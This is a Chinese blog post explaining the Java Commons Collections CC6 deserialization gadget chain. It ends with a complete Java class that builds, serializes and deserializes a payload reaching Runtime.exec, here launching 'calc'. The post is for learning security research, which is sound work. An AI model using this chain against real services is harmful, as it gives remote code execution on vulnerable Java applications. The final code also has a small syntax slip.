java cc链6

最新推荐文章于 2024-11-01 11:30:18 发布
最新推荐文章于 2024-11-01 11:30:18 发布
阅读量435 收藏 7
点赞数 8
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/135636288
版权

java cc链6
其实这条链是利用了LazyMap.get方法,在之前的cc链lazymap中已经提过就是

Transformer[] transformers = new Transformer[]{

            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",
                    new Class[]{String.class, Class[].class},
                    new Object[]{"getRuntime", null}),
            new InvokerTransformer("invoke",
                    new Class[]{Object.class, Object[].class},
                    new Object[]{null, null}),
            new InvokerTransformer("exec",
                    new Class[]{String.class},
                    new String[]{"calc"}),
    };
    ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);
    HashMap<Object,Object> map=new HashMap<>();
    Map<Object,Object> transformedmap= LazyMap.decorate(map,chainedTransformer);
    transformedmap.get("test");

接下来需要查找哪里调用了LazyMap.get方法,这里找到了TiedMapEntry.hashCode

transformedmap.get("test");

可以变化为

TiedMapEntry aaa = new TiedMapEntry(transformedmap, "aaa");
aaa.hashCode();

Hashmap类中,存在hash方法

static final int hash(Object key) {
    int h;
    return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

调用了key.hashCode(),并且这里的key参数可控,而hash方法又在readObject方法中被调用

putVal(hash(key), key, value, false, false);

那么就可以修改为

        TiedMapEntry aaa = new TiedMapEntry(transformedmap, "aaa");
//        aaa.hashCode();
        HashMap map2 = new HashMap<>();
        map2.put(aaa,"TiedMapEntry");

执行到这里发现已经进行了命令执行,是因为Hashmap.put方法也调用了hash

public V put(K key, V value) {
    return putVal(hash(key), key, value, false, true);
}

所以进行了命令执行,可以将之前命令执行的链路断开,再通过反射的方式修改回去,这样在put的时候就不会触发命令执行,这里在

//修改前
Map<Object,Object> transformedmap= LazyMap.decorate(map,chainedTransformer);
//修改后
Map<Object,Object> transformedmap= LazyMap.decorate(map,new ConstantFactory(1));

进行修改
反射修改为正常的链路

Class c= LazyMap.class;
Field factory = c.getDeclaredField("factory");
factory.setAccessible(true);
factory.set(transformedmap,chainedTransformer);

反序列化无法正常执行命令执行
问题出现在LazyMap.get方法中,当Hashmap.put方法运行时,key被添加到map中,导致反序列化时候 map.containsKey(key)≠false,也就是说存在键值,没有进入if中,那么我们直接删除这个键值就可以了

public Object get(Object key) {
    // create value for key if key is not currently in the map
    if (map.containsKey(key) == false) {
        Object value = factory.transform(key);
        map.put(key, value);
        return value;
    }
    return map.get(key);
}

所以最后的代码为

public class test04 {
    public static void serialize(Object object) throws Exception {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("person.bin"));
        oos.writeObject(object);
    }
    public static void unserialize(String filename) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        objectInputStream.readObject();
    }
    public static void main(String[] args) throws Exception {
        Transformer[] transformers = new Transformer[]{

                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",
                        new Class[]{String.class, Class[].class},
                        new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke",
                        new Class[]{Object.class, Object[].class},
                        new Object[]{null, null}),
                new InvokerTransformer("exec",
                        new Class[]{String.class},
                        new String[]{"calc"}),
        };
        ChainedTransformer chainedTransformer= new ChainedTransformer(transformers);
        HashMap<Object,Object> map=new HashMap<>();
//        Map<Object,Object> transformedmap= LazyMap.decorate(map,chainedTransformer);
        Map<Object,Object> transformedmap= LazyMap.decorate(map,new ConstantFactory(1));
//        transformedmap.get("test");
        TiedMapEntry aaa = new TiedMapEntry(transformedmap, "aaa");
//        aaa.hashCode();
        HashMap map2 = new HashMap<>();
        map2.put(aaa,"TiedMapEntry");
        transformedmap.remove("aaa");
        Class c= LazyMap.class;
        Field factory = c.getDeclaredField("factory");
        factory.setAccessible(true);
        factory.set(transformedmap,chainedTransformer)
//        serialize(map2);
        unserialize("person.bin");

    }
}

并且适用的java版本范围更广

天下是个小趴菜
关注
Java安全(七) CC1
WDWAGAAFGAGDADSA的博客
12-24 2389
Commons Collections 1的基本知识
java反序列化 cc6 分析
m0_64815693的博客
04-22 1124
java反序列化 cc6 分析
java反序列化——CC1
DamnVanish的博客
08-27 1199
完整的子追踪起来还是挺复杂的,里面很多地方也都只是浅尝而止,基础还是不牢固反射机制还学的不太明白。 等多看几条子就老实了。。。
Java反序列化利用篇 | CC6分析(通用版CC
哦 卷!
09-21 1101
构造方法的第二个参数用不到,所以随意传入进行,但是重要的是它接受一个Object对象,而这个对象的类需要实现Serializable接口,如果不是,则后续的序列化不能成功。属性设置为空的map对象(除上面创建的lazyMap都行),则最终就不会触发到恶意代码 (当然其他的也行:只要保证整个子到不了恶意代码就行)。方法在反序列化的时候会被调用,因此我们只需要创建一个HashMap对象,然后序列化即可。第2步将map属性设置为一个空的map对象(除上面创建的lazyMap都行)对象中的内容不完整呢?
java反序列化 cc1 分析
m0_64815693的博客
04-17 1355
java反序列化 cc1 分析
Java安全 CC1分析
Elite的博客
01-20 1873
Commons Collections:Java中有一个Collections包,内部封装了许多方法用来对集合进行处理,CommonsCollections则是对Collections进行了补充,完善了更多对集合处理的方法,大大提高了性能。
Java反序列化之CC1分析
热门推荐
混子
12-17 1万+
可能之前看Java CC1的文章留下了有阴影把,有TransformedMap玩法,还有Lazymap玩法,最终还得借助AnnotationInvocationHandler或这动态代理,看着就头大,所以拖了一段时间,没办法,最终还是来了,洞一直在更新,我不加快节奏干洞,洞要给我说再见,这就很难受,不闹了,这篇文章主要是CC1和那两种玩法
java审计CC1-7学习
superprintf的博客
01-06 890
[基础知识] CC(apache common collections组件漏洞利用) ysoserial java动态代理 Javassist动态编程 [分析] freebuf文章
Java安全研究——反序列化漏洞之CC
weixin_43889136的博客
04-13 4349
0x01前言 apachecommons-collections组件下的反序列化漏洞,自从该组件被爆出漏洞后,许多安全研究员相继挖掘到java多种组件的漏洞,危害严重。本人也是初学Java审计不久,技术薄弱,所以在此做一个cc的学习总结,如有错误还请大佬指出。 若本文有侵权行为,请立即私信,将全面修正。 0x02漏洞环境 JDK1.8 Apache Commons Collections 3.2版本 0x03反序列化漏洞 序列化是将对象的状态信息转换为可以存储或传输的形式的过程,通俗的说,.
Java代码审计&原生反序列化&CC跟踪分析
qq_46081990的博客
01-24 1684
观察到decorate方法调用过该构造方法TransformedMap,由此想到可以利用decorate方法间接控制valueTransformer,即控制decorate方法的传参valueTransformer=new InvokerTransformer(),那么执行decorate方法就会触发构造方法设置valueTransformer为InvokerTransformer类对象。总结:无非就是让前面调用方法的类发生更改,控制其等于后面的类,让其调用后面类的方法。
java安全(七) 反序列化3 CC利用 TransformedMap版
weixin_45694388的博客
04-21 3666
给个关注?宝儿! 给个关注?宝儿! 给个关注?宝儿! 关注公众号:b1gpig信息安全,文章推送不错过 众所周知,CommonCollections利⽤是作为反序列化学习不可绕i过的一关 图解 先挂一张wh1te8ea的利用图解,非常直观! 代码demo 分析: 代码使用了phith0n大佬的代码,对原本复杂的源码进行了优化,适合复现以及更加深刻理解 demo代码: package test.org.vulhub.Ser; import org.apache.commons.collecti.
Java安全 CC2分析
Elite的博客
03-16 1228
CC2适用于Apache common collection 4.0版本,由于该版本对AnnotationInvocationHandler类的readObject方法进行了修复,导致cc1无法使用,故产生了cc2,cc2与cc3相似,都使用了字节码的加载,并且后续的触发也基本相同
ysoserial CC5利用分析
weixin_45805993的博客
11-16 519
前两天东华杯没打,看里面签到题用到了 BadAttributeValueExpException.做入口类似的子,就来学习下同样用了这个类的CC5 Gadget Gadget chain: ObjectInputStream.readObject() BadAttributeValueExpException.readObject() TiedMapEntry.toString() LazyMap.get()
Java URL接动态添加参数,Java URL接删除参数,UrlUtils接参数工具类
蕃薯耀的博客
01-22 657
Java URL接动态添加参数,Java URL接删除参数,UrlUtils接参数工具类 ================================ ©Copyright 蕃薯耀2021-01-22 https://www.cnblogs.com/fanshuyao/ import java.util.LinkedHashMap; import java.util.Map; im...
网络安全(黑客)——自学2024
最新发布
2401_85026883的博客
11-01 1219
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
2024“源鲁杯“高校网络安全技能大赛-Misc-WP
ASD830的博客
10-25 1842
题目给了一张图片,flag就在图片上,不过不太明显,写个python脚本处理一下读取后得到flag。
信而泰防火墙安全测试解决方案:为网络安全保驾护航
XINERTEL的博客
10-31 1064
在当今数字化时代,网络安全至关重要。防火墙作为网络安全的第一道防线,其性能和可靠性直接影响到网络的安全性。信而泰提供的防火墙安全测试解决方案,旨在通过全面的测试流程,确保防火墙能够高效、准确地执行其安全任务。针对防火墙不同的功能点,我们可以进行相应的测试。
2024年网络安全进阶手册:黑客技术自学路线
2401_85026965的博客
10-29 1264
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
企业应该采用和支持网络安全的几个实践
QQ3007250950的博客
10-31 996
总之,虽然这些实践乍一看很简单,但网络安全工程师必须记住它们的重要性。有时候,好的解决方案是最简单的。有了复杂的政策,就会产生混乱,这正是恶意行为者所希望看到的。当这些实践融入到组织的文化中时,效果会更好。
Java连接MySQL数据库实战教程
"这篇教程介绍了如何使用Java连接MySQL数据库的基础步骤,包括下载和安装MySQL,配置JDBC驱动,以及在Eclipse中设置项目环境。同时,教程还展示了创建数据库、表,以及插入和查询数据的基本SQL操作。" 在Java开发中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值